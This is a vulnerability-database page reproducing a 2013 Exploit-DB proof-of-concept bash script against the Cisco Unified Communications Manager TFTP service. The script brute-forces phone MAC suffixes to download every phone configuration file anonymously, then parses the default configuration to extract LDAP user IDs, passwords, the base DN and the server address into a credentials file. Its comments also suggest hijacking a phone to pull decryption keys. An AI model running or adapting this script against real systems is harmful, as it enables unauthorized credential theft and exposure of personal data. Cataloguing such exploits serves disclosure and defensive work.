Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Cisco Unified Communications Manager - TFTP Service

🗓️ 12 Dec 2013 00:00:00Reported by daniel svartmanType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 37 Views

Enumerating and downloading Cisco phone configuration files via TFT

Code
#!/bin/bash
#######################################################################
# Proof of Concept on how to get tftp config files from cisco phones  #
# This can be performed anonymously and privileges gathered relies on #
# those assigned to the ldap account                                  #
# Developed by Daniel Svartman  ([email protected]             #
# In case tftp files are encrypted, you will need to hijack a phone   #
# and download the decryption key from the ROM memory                 #
#######################################################################                               

# This example below is for enumerating and downloading configuration files from phones
# With this you can gather personal information and sometimes also credentials from LDAP
# The first 8 digits of the MAC address relies on cisco mac address used by phones
# While the last 4 are generated automatically

BASE_MAC=$1
TFTP_SERVER=$2

perl -e '$var = 0x0001; for (1 .. 65535 ) { printf qq[%04X\n], $var++ }' > mac.txt

#Now we should download the files
while read LINE; do
	tftp ${TFTP_SERVER} -c get SEP${BASE_MAC}${LINE}.cnf.xml
done < mac.txt

#Finally, we download and process also the SPDefault.cnf.xml file
tftp ${TFTP_SERVER} -c get SPDefault.cnf.xml
USERID=`grep "UseUserCredential"  SPDefault.cnf.xml | cut -d ">" -f 6 | cut -d "<" -f 1`
echo "USERID: " $USERID > credentials.txt
PWD=`grep "UseUserCredential" SPDefault.cnf.xml | cut -d ">" -f 8 | cut -d "<" -f 1`
echo "PWD: " $PWD >> credentials.txt
BASE_DN=`grep "UseUserCredential" SPDefault.cnf.xml | cut -d ">" -f 10 | cut -d "<" -f 1`
echo "BASE_DN: " $BASE_DN >> credentials.txt
while read LINE; do	
			if [ "$LINE" = "<ProductType>Directory" ]; then
				read LINE
				ADDRESS=`echo $LINE | cut -d ">" -f 2 | cut -d "<" -f 1`
				echo "LDAP_IP_ADDRESS: " $ADDRESS >> credentials.txt
			fi
done < SPDefault.cnf.xml

echo "Done - Please, check credentials.txt file, also review all the SEPxxxx.cnf.xml files for further credentials"

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
12 Dec 2013 00:00Current
7.4High risk
Vulners AI Score7.4
ciscounified communicationstftp serviceconfiguration filesldapmac addressprivilegesencryptionrom memorydownloadprocesscredentials.
37